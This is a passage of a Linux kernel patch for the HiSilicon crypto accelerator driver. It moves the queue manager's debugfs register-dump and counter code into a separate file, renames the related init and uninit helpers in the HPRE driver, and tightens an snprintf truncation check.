++	return 0;
++}
++
++static void qm_last_regs_uninit(struct hisi_qm *qm)
++{
++	struct qm_debug *debug = &qm->debug;
++
++	if (qm->fun_type == QM_HW_VF || !debug->qm_last_words)
++		return;
++
++	kfree(debug->qm_last_words);
++	debug->qm_last_words = NULL;
++}
++
++static int qm_last_regs_init(struct hisi_qm *qm)
++{
++	int dfx_regs_num = ARRAY_SIZE(qm_dfx_regs);
++	struct qm_debug *debug = &qm->debug;
++	int i;
++
++	if (qm->fun_type == QM_HW_VF)
++		return 0;
++
++	debug->qm_last_words = kcalloc(dfx_regs_num, sizeof(unsigned int), GFP_KERNEL);
++	if (!debug->qm_last_words)
++		return -ENOMEM;
++
++	for (i = 0; i < dfx_regs_num; i++) {
++		debug->qm_last_words[i] = readl_relaxed(qm->io_base +
++			qm_dfx_regs[i].offset);
++	}
++
++	return 0;
++}
++
++static void qm_diff_regs_uninit(struct hisi_qm *qm, u32 reg_len)
++{
++	dfx_regs_uninit(qm, qm->debug.acc_diff_regs, reg_len);
++	dfx_regs_uninit(qm, qm->debug.qm_diff_regs, ARRAY_SIZE(qm_diff_regs));
++}
++
++/**
++ * hisi_qm_regs_debugfs_init() - Allocate memory for registers.
++ * @qm: device qm handle.
++ * @dregs: diff registers handle.
++ * @reg_len: diff registers region length.
++ */
++int hisi_qm_regs_debugfs_init(struct hisi_qm *qm,
++		struct dfx_diff_registers *dregs, u32 reg_len)
++{
++	int ret;
++
++	if (!qm || !dregs)
++		return -EINVAL;
++
++	if (qm->fun_type != QM_HW_PF)
++		return 0;
++
++	ret = qm_last_regs_init(qm);
++	if (ret) {
++		dev_info(&qm->pdev->dev, "failed to init qm words memory!\n");
++		return ret;
++	}
++
++	ret = qm_diff_regs_init(qm, dregs, reg_len);
++	if (ret) {
++		qm_last_regs_uninit(qm);
++		return ret;
++	}
++
++	return 0;
++}
++EXPORT_SYMBOL_GPL(hisi_qm_regs_debugfs_init);
++
++/**
++ * hisi_qm_regs_debugfs_uninit() - Free memory for registers.
++ * @qm: device qm handle.
++ * @reg_len: diff registers region length.
++ */
++void hisi_qm_regs_debugfs_uninit(struct hisi_qm *qm, u32 reg_len)
++{
++	if (!qm || qm->fun_type != QM_HW_PF)
++		return;
++
++	qm_diff_regs_uninit(qm, reg_len);
++	qm_last_regs_uninit(qm);
++}
++EXPORT_SYMBOL_GPL(hisi_qm_regs_debugfs_uninit);
++
++/**
++ * hisi_qm_acc_diff_regs_dump() - Dump registers' values.
++ * @qm: device qm handle.
++ * @s: Debugfs file handle.
++ * @dregs: diff registers handle.
++ * @regs_len: diff registers region length.
++ */
++void hisi_qm_acc_diff_regs_dump(struct hisi_qm *qm, struct seq_file *s,
++	struct dfx_diff_registers *dregs, u32 regs_len)
++{
++	u32 j, val, base_offset;
++	int i, ret;
++
++	if (!qm || !s || !dregs)
++		return;
++
++	ret = hisi_qm_get_dfx_access(qm);
++	if (ret)
++		return;
++
++	down_read(&qm->qps_lock);
++	for (i = 0; i < regs_len; i++) {
++		if (!dregs[i].reg_len)
++			continue;
++
++		for (j = 0; j < dregs[i].reg_len; j++) {
++			base_offset = dregs[i].reg_offset + j * QM_DFX_REGS_LEN;
++			val = readl(qm->io_base + base_offset);
++			if (val != dregs[i].regs[j])
++				seq_printf(s, "0x%08x = 0x%08x ---> 0x%08x\n",
++					   base_offset, dregs[i].regs[j], val);
++		}
++	}
++	up_read(&qm->qps_lock);
++
++	hisi_qm_put_dfx_access(qm);
++}
++EXPORT_SYMBOL_GPL(hisi_qm_acc_diff_regs_dump);
++
++void hisi_qm_show_last_dfx_regs(struct hisi_qm *qm)
++{
++	struct qm_debug *debug = &qm->debug;
++	struct pci_dev *pdev = qm->pdev;
++	u32 val;
++	int i;
++
++	if (qm->fun_type == QM_HW_VF || !debug->qm_last_words)
++		return;
++
++	for (i = 0; i < ARRAY_SIZE(qm_dfx_regs); i++) {
++		val = readl_relaxed(qm->io_base + qm_dfx_regs[i].offset);
++		if (debug->qm_last_words[i] != val)
++			pci_info(pdev, "%s \t= 0x%08x => 0x%08x\n",
++			qm_dfx_regs[i].name, debug->qm_last_words[i], val);
++	}
++}
++
++static int qm_diff_regs_show(struct seq_file *s, void *unused)
++{
++	struct hisi_qm *qm = s->private;
++
++	hisi_qm_acc_diff_regs_dump(qm, s, qm->debug.qm_diff_regs,
++					ARRAY_SIZE(qm_diff_regs));
++
++	return 0;
++}
++DEFINE_SHOW_ATTRIBUTE(qm_diff_regs);
++
++static ssize_t qm_status_read(struct file *filp, char __user *buffer,
++			      size_t count, loff_t *pos)
++{
++	struct hisi_qm *qm = filp->private_data;
++	char buf[QM_DBG_READ_LEN];
++	int val, len;
++
++	val = atomic_read(&qm->status.flags);
++	len = scnprintf(buf, QM_DBG_READ_LEN, "%s\n", qm_s[val]);
++
++	return simple_read_from_buffer(buffer, count, pos, buf, len);
++}
++
++static const struct file_operations qm_status_fops = {
++	.owner = THIS_MODULE,
++	.open = simple_open,
++	.read = qm_status_read,
++};
++
++static void qm_create_debugfs_file(struct hisi_qm *qm, struct dentry *dir,
++				   enum qm_debug_file index)
++{
++	struct debugfs_file *file = qm->debug.files + index;
++
++	debugfs_create_file(qm_debug_file_name[index], 0600, dir, file,
++			    &qm_debug_fops);
++
++	file->index = index;
++	mutex_init(&file->lock);
++	file->debug = &qm->debug;
++}
++
++static int qm_debugfs_atomic64_set(void *data, u64 val)
++{
++	if (val)
++		return -EINVAL;
++
++	atomic64_set((atomic64_t *)data, 0);
++
++	return 0;
++}
++
++static int qm_debugfs_atomic64_get(void *data, u64 *val)
++{
++	*val = atomic64_read((atomic64_t *)data);
++
++	return 0;
++}
++
++DEFINE_DEBUGFS_ATTRIBUTE(qm_atomic64_ops, qm_debugfs_atomic64_get,
++			 qm_debugfs_atomic64_set, "%llu\n");
++
++/**
++ * hisi_qm_debug_init() - Initialize qm related debugfs files.
++ * @qm: The qm for which we want to add debugfs files.
++ *
++ * Create qm related debugfs files.
++ */
++void hisi_qm_debug_init(struct hisi_qm *qm)
++{
++	struct dfx_diff_registers *qm_regs = qm->debug.qm_diff_regs;
++	struct qm_dfx *dfx = &qm->debug.dfx;
++	struct dentry *qm_d;
++	void *data;
++	int i;
++
++	qm_d = debugfs_create_dir("qm", qm->debug.debug_root);
++	qm->debug.qm_d = qm_d;
++
++	/* Only create these files for the PF */
++	if (qm->fun_type == QM_HW_PF) {
++		qm_create_debugfs_file(qm, qm->debug.debug_root, CURRENT_QM);
++		for (i = CURRENT_Q; i < DEBUG_FILE_NUM; i++)
++			qm_create_debugfs_file(qm, qm->debug.qm_d, i);
++	}
++
++	if (qm_regs)
++		debugfs_create_file("diff_regs", 0444, qm->debug.qm_d,
++					qm, &qm_diff_regs_fops);
++
++	debugfs_create_file("regs", 0444, qm->debug.qm_d, qm, &qm_regs_fops);
++
++	debugfs_create_file("cmd", 0600, qm->debug.qm_d, qm, &qm_cmd_fops);
++
++	debugfs_create_file("status", 0444, qm->debug.qm_d, qm,
++			&qm_status_fops);
++	for (i = 0; i < ARRAY_SIZE(qm_dfx_files); i++) {
++		data = (atomic64_t *)((uintptr_t)dfx + qm_dfx_files[i].offset);
++		debugfs_create_file(qm_dfx_files[i].name,
++			0644,
++			qm_d,
++			data,
++			&qm_atomic64_ops);
++	}
++
++	if (test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps))
++		hisi_qm_set_algqos_init(qm);
++}
++EXPORT_SYMBOL_GPL(hisi_qm_debug_init);
++
++/**
++ * hisi_qm_debug_regs_clear() - clear qm debug related registers.
++ * @qm: The qm for which we want to clear its debug registers.
++ */
++void hisi_qm_debug_regs_clear(struct hisi_qm *qm)
++{
++	const struct debugfs_reg32 *regs;
++	int i;
++
++	/* clear current_qm */
++	writel(0x0, qm->io_base + QM_DFX_MB_CNT_VF);
++	writel(0x0, qm->io_base + QM_DFX_DB_CNT_VF);
++
++	/* clear current_q */
++	writel(0x0, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
++	writel(0x0, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
++
++	/*
++	 * These registers are read-clear, so reading them once while
++	 * clear-enable is set clears their counts.
++	 */
++	writel(0x1, qm->io_base + QM_DFX_CNT_CLR_CE);
++
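++	/* Read each read-clear counter once to reset it */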
++	regs = qm_dfx_regs;
++	for (i = 0; i < CNT_CYC_REGS_NUM; i++) {
++		readl(qm->io_base + regs->offset);
++		regs++;
++	}
++
++	/* clear clear_enable */
++	writel(0x0, qm->io_base + QM_DFX_CNT_CLR_CE);
++}
++EXPORT_SYMBOL_GPL(hisi_qm_debug_regs_clear);
+diff --git a/drivers/crypto/hisilicon/hpre/hpre_main.c b/drivers/crypto/hisilicon/hpre/hpre_main.c
+index baf1faec7046f..ff8a5f20a5df0 100644
+--- a/drivers/crypto/hisilicon/hpre/hpre_main.c
++++ b/drivers/crypto/hisilicon/hpre/hpre_main.c
+@@ -431,8 +431,11 @@ static u32 uacce_mode = UACCE_MODE_NOUACCE;
+ module_param_cb(uacce_mode, &hpre_uacce_mode_ops, &uacce_mode, 0444);
+ MODULE_PARM_DESC(uacce_mode, UACCE_MODE_DESC);
+ 
++static bool pf_q_num_flag;
+ static int pf_q_num_set(const char *val, const struct kernel_param *kp)
+ {
++	pf_q_num_flag = true;
++
+ 	return q_num_set(val, kp, PCI_DEVICE_ID_HUAWEI_HPRE_PF);
+ }
+ 
+@@ -1031,7 +1034,7 @@ static int hpre_cluster_debugfs_init(struct hisi_qm *qm)
+ 
+ 	for (i = 0; i < clusters_num; i++) {
+ 		ret = snprintf(buf, HPRE_DBGFS_VAL_MAX_LEN, "cluster%d", i);
+-		if (ret < 0)
++		if (ret >= HPRE_DBGFS_VAL_MAX_LEN)
+ 			return -EINVAL;
+ 		tmp_d = debugfs_create_dir(buf, qm->debug.debug_root);
+ 
+@@ -1101,8 +1104,7 @@ static int hpre_debugfs_init(struct hisi_qm *qm)
+ 
+ 	qm->debug.sqe_mask_offset = HPRE_SQE_MASK_OFFSET;
+ 	qm->debug.sqe_mask_len = HPRE_SQE_MASK_LEN;
+-	ret = hisi_qm_diff_regs_init(qm, hpre_diff_regs,
+-				ARRAY_SIZE(hpre_diff_regs));
++	ret = hisi_qm_regs_debugfs_init(qm, hpre_diff_regs, ARRAY_SIZE(hpre_diff_regs));
+ 	if (ret) {
+ 		dev_warn(dev, "Failed to init HPRE diff regs!\n");
+ 		goto debugfs_remove;
+@@ -1121,7 +1123,7 @@ static int hpre_debugfs_init(struct hisi_qm *qm)
+ 	return 0;
+ 
+ failed_to_create:
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(hpre_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(hpre_diff_regs));
+ debugfs_remove:
+ 	debugfs_remove_recursive(qm->debug.debug_root);
+ 	return ret;
+@@ -1129,7 +1131,7 @@ debugfs_remove:
+ 
+ static void hpre_debugfs_exit(struct hisi_qm *qm)
+ {
+-	hisi_qm_diff_regs_uninit(qm, ARRAY_SIZE(hpre_diff_regs));
++	hisi_qm_regs_debugfs_uninit(qm, ARRAY_SIZE(hpre_diff_regs));
+ 
+ 	debugfs_remove_recursive(qm->debug.debug_root);
+ }
+@@ -1156,6 +1158,8 @@ static int hpre_qm_init(struct hisi_qm *qm, struct pci_dev *pdev)
+ 		qm->qp_num = pf_q_num;
+ 		qm->debug.curr_qm_qp_num = pf_q_num;
+ 		qm->qm_list = &hpre_devices;
++		if (pf_q_num_flag)
++			set_bit(QM_MODULE_PARAM, &qm->misc_ctl);
+ 	}
+ 
+ 	ret = hisi_qm_init(qm);
+diff --git a/drivers/crypto/hisilicon/qm.c b/drivers/crypto/hisilicon/qm.c
+index 07e1e39a5e378..a4a3895c74181 100644
+--- a/drivers/crypto/hisilicon/qm.c
++++ b/drivers/crypto/hisilicon/qm.c
+@@ -16,6 +16,7 @@
+ #include <linux/uaccess.h>
+ #include <uapi/misc/uacce/hisi_qm.h>
+ #include <linux/hisi_acc_qm.h>
++#include "qm_common.h"
+ 
+ /* eq/aeq irq enable */
+ #define QM_VF_AEQ_INT_SOURCE		0x0
+@@ -119,8 +120,6 @@
+ #define QM_SQC_VFT_NUM_SHIFT_V2		45
+ #define QM_SQC_VFT_NUM_MASK_v2		GENMASK(9, 0)
+ 
+-#define QM_DFX_CNT_CLR_CE		0x100118
+-
+ #define QM_ABNORMAL_INT_SOURCE		0x100000
+ #define QM_ABNORMAL_INT_MASK		0x100004
+ #define QM_ABNORMAL_INT_MASK_VALUE	0x7fff
+@@ -187,14 +186,6 @@
+ #define QM_VF_RESET_WAIT_TIMEOUT_US    \
+ 	(QM_VF_RESET_WAIT_US * QM_VF_RESET_WAIT_CNT)
+ 
+-#define QM_DFX_MB_CNT_VF		0x104010
+-#define QM_DFX_DB_CNT_VF		0x104020
+-#define QM_DFX_SQE_CNT_VF_SQN		0x104030
+-#define QM_DFX_CQE_CNT_VF_CQN		0x104040
+-#define QM_DFX_QN_SHIFT			16
+-#define CURRENT_FUN_MASK		GENMASK(5, 0)
+-#define CURRENT_Q_MASK			GENMASK(31, 16)
+-
+ #define POLL_PERIOD			10
+ #define POLL_TIMEOUT			1000
+ #define WAIT_PERIOD_US_MAX		200
+@@ -211,19 +202,13 @@
+ #define QMC_ALIGN(sz)			ALIGN(sz, 32)
+ 
+ #define QM_DBG_READ_LEN		256
+-#define QM_DBG_WRITE_LEN		1024
+-#define QM_DBG_TMP_BUF_LEN		22
+ #define QM_PCI_COMMAND_INVALID		~0
+ #define QM_RESET_STOP_TX_OFFSET		1
+ #define QM_RESET_STOP_RX_OFFSET		2
+ 
+ #define WAIT_PERIOD			20
+ #define REMOVE_WAIT_DELAY		10
+-#define QM_SQE_ADDR_MASK		GENMASK(7, 0)
+ 
+-#define QM_DRIVER_REMOVING		0
+-#define QM_RST_SCHED			1
+-#define QM_RESETTING			2
+ #define QM_QOS_PARAM_NUM		2
+ #define QM_QOS_VAL_NUM			1
+ #define QM_QOS_BDF_PARAM_NUM		4
+@@ -250,15 +235,6 @@
+ #define QM_QOS_MIN_CIR_B		100
+ #define QM_QOS_MAX_CIR_U		6
+ #define QM_QOS_MAX_CIR_S		11
+-#define QM_DFX_BASE		0x0100000
+-#define QM_DFX_STATE1		0x0104000
+-#define QM_DFX_STATE2		0x01040C8
+-#define QM_DFX_COMMON		0x0000
+-#define QM_DFX_BASE_LEN		0x5A
+-#define QM_DFX_STATE1_LEN		0x2E
+-#define QM_DFX_STATE2_LEN		0x11
+-#define QM_DFX_COMMON_LEN		0xC3
+-#define QM_DFX_REGS_LEN		4UL
+ #define QM_AUTOSUSPEND_DELAY		3000
+ 
+ #define QM_MK_CQC_DW3_V1(hop_num, pg_sz, buf_sz, cqe_sz) \
+@@ -368,73 +344,6 @@ static const struct hisi_qm_cap_info qm_basic_info[] = {
+ 	{QM_VF_IRQ_NUM_CAP,     0x311c,   0,  GENMASK(15, 0), 0x1,       0x2,       0x3},
+ };
+ 
+-struct qm_cqe {
+-	__le32 rsvd0;
+-	__le16 cmd_id;
+-	__le16 rsvd1;
+-	__le16 sq_head;
+-	__le16 sq_num;
+-	__le16 rsvd2;
+-	__le16 w7;
+-};
+-
+-struct qm_eqe {
+-	__le32 dw0;
+-};
+-
+-struct qm_aeqe {
+-	__le32 dw0;
+-};
+-
+-struct qm_sqc {
+-	__le16 head;
+-	__le16 tail;
+-	__le32 base_l;
+-	__le32 base_h;
+-	__le32 dw3;
+-	__le16 w8;
+-	__le16 rsvd0;
+-	__le16 pasid;
+-	__le16 w11;
+-	__le16 cq_num;
+-	__le16 w13;
+-	__le32 rsvd1;
+-};
+-
+-struct qm_cqc {
+-	__le16 head;
+-	__le16 tail;
+-	__le32 base_l;
+-	__le32 base_h;
+-	__le32 dw3;
+-	__le16 w8;
+-	__le16 rsvd0;
+-	__le16 pasid;
+-	__le16 w11;
+-	__le32 dw6;
+-	__le32 rsvd1;
+-};
+-
+-struct qm_eqc {
+-	__le16 head;
+-	__le16 tail;
+-	__le32 base_l;
+-	__le32 base_h;
+-	__le32 dw3;
+-	__le32 rsvd[2];
+-	__le32 dw6;
+-};
+-
+-struct qm_aeqc {
+-	__le16 head;
+-	__le16 tail;
+-	__le32 base_l;
+-	__le32 base_h;
+-	__le32 dw3;
+-	__le32 rsvd[2];
+-	__le32 dw6;
+-};
+-
+ struct qm_mailbox {
+ 	__le16 w0;
+ 	__le16 queue_num;
+@@ -467,25 +376,6 @@ struct hisi_qm_hw_ops {
+ 	int (*set_msi)(struct hisi_qm *qm, bool set);
+ };
+ 
+-struct qm_dfx_item {
+-	const char *name;
+-	u32 offset;
+-};
+-
+-static struct qm_dfx_item qm_dfx_files[] = {
+-	{"err_irq", offsetof(struct qm_dfx, err_irq_cnt)},
+-	{"aeq_irq", offsetof(struct qm_dfx, aeq_irq_cnt)},
+-	{"abnormal_irq", offsetof(struct qm_dfx, abnormal_irq_cnt)},
+-	{"create_qp_err", offsetof(struct qm_dfx, create_qp_err_cnt)},
+-	{"mb_err", offsetof(struct qm_dfx, mb_err_cnt)},
+-};
+-
+-static const char * const qm_debug_file_name[] = {
+-	[CURRENT_QM]   = "current_qm",
+-	[CURRENT_Q]    = "current_q",
+-	[CLEAR_ENABLE] = "clear_enable",
+-};
+-
+ struct hisi_qm_hw_error {
+ 	u32 int_msk;
+ 	const char *msg;
+@@ -510,23 +400,6 @@ static const struct hisi_qm_hw_error qm_hw_error[] = {
+ 	{ /* sentinel */ }
+ };
+ 
+-/* define the QM's dfx regs region and region length */
+-static struct dfx_diff_registers qm_diff_regs[] = {
+-	{
+-		.reg_offset = QM_DFX_BASE,
+-		.reg_len = QM_DFX_BASE_LEN,
+-	}, {
+-		.reg_offset = QM_DFX_STATE1,
+-		.reg_len = QM_DFX_STATE1_LEN,
+-	}, {
+-		.reg_offset = QM_DFX_STATE2,
+-		.reg_len = QM_DFX_STATE2_LEN,
+-	}, {
+-		.reg_offset = QM_DFX_COMMON,
+-		.reg_len = QM_DFX_COMMON_LEN,
+-	},
+-};
+-
+ static const char * const qm_db_timeout[] = {
+ 	"sq", "cq", "eq", "aeq",
+ };
+@@ -535,10 +408,6 @@ static const char * const qm_fifo_overflow[] = {
+ 	"cq", "eq", "aeq",
+ };
+ 
+-static const char * const qm_s[] = {
+-	"init", "start", "close", "stop",
+-};
+-
+ static const char * const qp_s[] = {
+ 	"none", "init", "start", "stop", "close",
+ };
+@@ -1324,999 +1193,158 @@ static void qm_vft_data_cfg(struct hisi_qm *qm, enum vft_type type, u32 base,
+ 				tmp = QM_CQC_VFT_VALID;
+ 			}
+ 			break;
+-		case SHAPER_VFT:
+-			if (factor) {
+-				tmp = factor->cir_b |
+-				(factor->cir_u << QM_SHAPER_FACTOR_CIR_U_SHIFT) |
+-				(factor->cir_s << QM_SHAPER_FACTOR_CIR_S_SHIFT) |
+-				(QM_SHAPER_CBS_B << QM_SHAPER_FACTOR_CBS_B_SHIFT) |
+-				(factor->cbs_s << QM_SHAPER_FACTOR_CBS_S_SHIFT);
+-			}
+-			break;
+-		}
+-	}
+-
+-	writel(lower_32_bits(tmp), qm->io_base + QM_VFT_CFG_DATA_L);
+-	writel(upper_32_bits(tmp), qm->io_base + QM_VFT_CFG_DATA_H);
+-}
+-
+-static int qm_set_vft_common(struct hisi_qm *qm, enum vft_type type,
+-			     u32 fun_num, u32 base, u32 number)
+-{
+-	struct qm_shaper_factor *factor = NULL;
+-	unsigned int val;
+-	int ret;
+-
+-	if (type == SHAPER_VFT && test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps))
+-		factor = &qm->factor[fun_num];
+-
+-	ret = readl_relaxed_poll_timeout(qm->io_base + QM_VFT_CFG_RDY, val,
+-					 val & BIT(0), POLL_PERIOD,
+-					 POLL_TIMEOUT);
+-	if (ret)
+-		return ret;
+-
+-	writel(0x0, qm->io_base + QM_VFT_CFG_OP_WR);
+-	writel(type, qm->io_base + QM_VFT_CFG_TYPE);
+-	if (type == SHAPER_VFT)
+-		fun_num |= base << QM_SHAPER_VFT_OFFSET;
+-
+-	writel(fun_num, qm->io_base + QM_VFT_CFG);
+-
+-	qm_vft_data_cfg(qm, type, base, number, factor);
+-
+-	writel(0x0, qm->io_base + QM_VFT_CFG_RDY);
+-	writel(0x1, qm->io_base + QM_VFT_CFG_OP_ENABLE);
+-
+-	return readl_relaxed_poll_timeout(qm->io_base + QM_VFT_CFG_RDY, val,
+-					  val & BIT(0), POLL_PERIOD,
+-					  POLL_TIMEOUT);
+-}
+-
+-static int qm_shaper_init_vft(struct hisi_qm *qm, u32 fun_num)
+-{
+-	u32 qos = qm->factor[fun_num].func_qos;
+-	int ret, i;
+-
+-	ret = qm_get_shaper_para(qos * QM_QOS_RATE, &qm->factor[fun_num]);
+-	if (ret) {
+-		dev_err(&qm->pdev->dev, "failed to calculate shaper parameter!\n");
+-		return ret;
+-	}
+-	writel(qm->type_rate, qm->io_base + QM_SHAPER_CFG);
+-	for (i = ALG_TYPE_0; i <= ALG_TYPE_1; i++) {
+-		/* The base number of queue reuse for different alg type */
+-		ret = qm_set_vft_common(qm, SHAPER_VFT, fun_num, i, 1);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	return 0;
+-}
+-
+-/* The config should be conducted after qm_dev_mem_reset() */
+-static int qm_set_sqc_cqc_vft(struct hisi_qm *qm, u32 fun_num, u32 base,
+-			      u32 number)
+-{
+-	int ret, i;
+-
+-	for (i = SQC_VFT; i <= CQC_VFT; i++) {
+-		ret = qm_set_vft_common(qm, i, fun_num, base, number);
+-		if (ret)
+-			return ret;
+-	}
+-
+-	/* init default shaper qos val */
+-	if (test_bit(QM_SUPPORT_FUNC_QOS, &qm->caps)) {
+-		ret = qm_shaper_init_vft(qm, fun_num);
+-		if (ret)
+-			goto back_sqc_cqc;
+-	}
+-
+-	return 0;
+-back_sqc_cqc:
+-	for (i = SQC_VFT; i <= CQC_VFT; i++)
+-		qm_set_vft_common(qm, i, fun_num, 0, 0);
+-
+-	return ret;
+-}
+-
+-static int qm_get_vft_v2(struct hisi_qm *qm, u32 *base, u32 *number)
+-{
+-	u64 sqc_vft;
+-	int ret;
+-
+-	ret = hisi_qm_mb(qm, QM_MB_CMD_SQC_VFT_V2, 0, 0, 1);
+-	if (ret)
+-		return ret;
+-
+-	sqc_vft = readl(qm->io_base + QM_MB_CMD_DATA_ADDR_L) |
+-		  ((u64)readl(qm->io_base + QM_MB_CMD_DATA_ADDR_H) << 32);
+-	*base = QM_SQC_VFT_BASE_MASK_V2 & (sqc_vft >> QM_SQC_VFT_BASE_SHIFT_V2);
+-	*number = (QM_SQC_VFT_NUM_MASK_v2 &
+-		   (sqc_vft >> QM_SQC_VFT_NUM_SHIFT_V2)) + 1;
+-
+-	return 0;
+-}
+-
+-static int qm_get_vf_qp_num(struct hisi_qm *qm, u32 fun_num)
+-{
+-	u32 remain_q_num, vfq_num;
+-	u32 num_vfs = qm->vfs_num;
+-
+-	vfq_num = (qm->ctrl_qp_num - qm->qp_num) / num_vfs;
+-	if (vfq_num >= qm->max_qp_num)
+-		return qm->max_qp_num;
+-
+-	remain_q_num = (qm->ctrl_qp_num - qm->qp_num) % num_vfs;
+-	if (vfq_num + remain_q_num <= qm->max_qp_num)
+-		return fun_num == num_vfs ? vfq_num + remain_q_num : vfq_num;
+-
+-	/*
+-	 * if vfq_num + remain_q_num > max_qp_num, the last VFs,
+-	 * each with one more queue.
+-	 */
+-	return fun_num + remain_q_num > num_vfs ? vfq_num + 1 : vfq_num;
+-}
+-
+-static struct hisi_qm *file_to_qm(struct debugfs_file *file)
+-{
+-	struct qm_debug *debug = file->debug;
+-
+-	return container_of(debug, struct hisi_qm, debug);
+-}
+-
+-static u32 current_q_read(struct hisi_qm *qm)
+-{
+-	return readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) >> QM_DFX_QN_SHIFT;
+-}
+-
+-static int current_q_write(struct hisi_qm *qm, u32 val)
+-{
+-	u32 tmp;
+-
+-	if (val >= qm->debug.curr_qm_qp_num)
+-		return -EINVAL;
+-
+-	tmp = val << QM_DFX_QN_SHIFT |
+-	      (readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) & CURRENT_FUN_MASK);
+-	writel(tmp, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
+-
+-	tmp = val << QM_DFX_QN_SHIFT |
+-	      (readl(qm->io_base + QM_DFX_CQE_CNT_VF_CQN) & CURRENT_FUN_MASK);
+-	writel(tmp, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
+-
+-	return 0;
+-}
+-
+-static u32 clear_enable_read(struct hisi_qm *qm)
+-{
+-	return readl(qm->io_base + QM_DFX_CNT_CLR_CE);
+-}
+-
+-/* rd_clr_ctrl 1 enable read clear, otherwise 0 disable it */
+-static int clear_enable_write(struct hisi_qm *qm, u32 rd_clr_ctrl)
+-{
+-	if (rd_clr_ctrl > 1)
+-		return -EINVAL;
+-
+-	writel(rd_clr_ctrl, qm->io_base + QM_DFX_CNT_CLR_CE);
+-
+-	return 0;
+-}
+-
+-static u32 current_qm_read(struct hisi_qm *qm)
+-{
+-	return readl(qm->io_base + QM_DFX_MB_CNT_VF);
+-}
+-
+-static int current_qm_write(struct hisi_qm *qm, u32 val)
+-{
+-	u32 tmp;
+-
+-	if (val > qm->vfs_num)
+-		return -EINVAL;
+-
+-	/* According PF or VF Dev ID to calculation curr_qm_qp_num and store */
+-	if (!val)
+-		qm->debug.curr_qm_qp_num = qm->qp_num;
+-	else
+-		qm->debug.curr_qm_qp_num = qm_get_vf_qp_num(qm, val);
+-
+-	writel(val, qm->io_base + QM_DFX_MB_CNT_VF);
+-	writel(val, qm->io_base + QM_DFX_DB_CNT_VF);
+-
+-	tmp = val |
+-	      (readl(qm->io_base + QM_DFX_SQE_CNT_VF_SQN) & CURRENT_Q_MASK);
+-	writel(tmp, qm->io_base + QM_DFX_SQE_CNT_VF_SQN);
+-
+-	tmp = val |
+-	      (readl(qm->io_base + QM_DFX_CQE_CNT_VF_CQN) & CURRENT_Q_MASK);
+-	writel(tmp, qm->io_base + QM_DFX_CQE_CNT_VF_CQN);
+-
+-	return 0;
+-}
+-
+-static ssize_t qm_debug_read(struct file *filp, char __user *buf,
+-			     size_t count, loff_t *pos)
+-{
+-	struct debugfs_file *file = filp->private_data;
+-	enum qm_debug_file index = file->index;
+-	struct hisi_qm *qm = file_to_qm(file);
+-	char tbuf[QM_DBG_TMP_BUF_LEN];
+-	u32 val;
+-	int ret;
+-
+-	ret = hisi_qm_get_dfx_access(qm);
+-	if (ret)
+-		return ret;
+-
+-	mutex_lock(&file->lock);
+-	switch (index) {
+-	case CURRENT_QM:
+-		val = current_qm_read(qm);
+-		break;
+-	case CURRENT_Q:
+-		val = current_q_read(qm);
+-		break;
+-	case CLEAR_ENABLE:
+-		val = clear_enable_read(qm);
+-		break;
+-	default:
+-		goto err_input;
+-	}
+-	mutex_unlock(&file->lock);
+-
+-	hisi_qm_put_dfx_access(qm);
+-	ret = scnprintf(tbuf, QM_DBG_TMP_BUF_LEN, "%u\n", val);
+-	return simple_read_from_buffer(buf, count, pos, tbuf, ret);
+-
+-err_input:
+-	mutex_unlock(&file->lock);
+-	hisi_qm_put_dfx_access(qm);
+-	return -EINVAL;
+-}
+-
+-static ssize_t qm_debug_write(struct file *filp, const char __user *buf,
+-			      size_t count, loff_t *pos)
+-{
+-	struct debugfs_file *file = filp->private_data;
+-	enum qm_debug_file index = file->index;
+-	struct hisi_qm *qm = file_to_qm(file);
+-	unsigned long val;
+-	char tbuf[QM_DBG_TMP_BUF_LEN];
+-	int len, ret;
+-
+-	if (*pos != 0)
+-		return 0;
+-
+-	if (count >= QM_DBG_TMP_BUF_LEN)
+-		return -ENOSPC;
+-
+-	len = simple_write_to_buffer(tbuf, QM_DBG_TMP_BUF_LEN - 1, pos, buf,
+-				     count);
+-	if (len < 0)
+-		return len;
+-
+-	tbuf[len] = '\0';
+-	if (kstrtoul(tbuf, 0, &val))
+-		return -EFAULT;
+-
+-	ret = hisi_qm_get_dfx_access(qm);
+-	if (ret)
+-		return ret;
+-
+-	mutex_lock(&file->lock);
+-	switch (index) {
+-	case CURRENT_QM:
+-		ret = current_qm_write(qm, val);
+-		break;
+-	case CURRENT_Q:
+-		ret = current_q_write(qm, val);
+-		break;
+-	case CLEAR_ENABLE:
+-		ret = clear_enable_write(qm, val);
+-		break;
+-	default:
+-		ret = -EINVAL;
+-	}
+-	mutex_unlock(&file->lock);
+-
+-	hisi_qm_put_dfx_access(qm);
+-
+-	if (ret)
+-		return ret;
+-
+-	return count;
+-}
+-
+-static const struct file_operations qm_debug_fops = {
+-	.owner = THIS_MODULE,
+-	.open = simple_open,
+-	.read = qm_debug_read,
+-	.write = qm_debug_write,
+-};
+-
+-#define CNT_CYC_REGS_NUM		10
+-static const struct debugfs_reg32 qm_dfx_regs[] = {
+-	/* XXX_CNT are reading clear register */
+-	{"QM_ECC_1BIT_CNT               ",  0x104000ull},
+-	{"QM_ECC_MBIT_CNT               ",  0x104008ull},
+-	{"QM_DFX_MB_CNT                 ",  0x104018ull},
+-	{"QM_DFX_DB_CNT                 ",  0x104028ull},
+-	{"QM_DFX_SQE_CNT                ",  0x104038ull},
+-	{"QM_DFX_CQE_CNT                ",  0x104048ull},
+-	{"QM_DFX_SEND_SQE_TO_ACC_CNT    ",  0x104050ull},
+-	{"QM_DFX_WB_SQE_FROM_ACC_CNT    ",  0x104058ull},
+-	{"QM_DFX_ACC_FINISH_CNT         ",  0x104060ull},
+-	{"QM_DFX_CQE_ERR_CNT            ",  0x1040b4ull},
+-	{"QM_DFX_FUNS_ACTIVE_ST         ",  0x200ull},
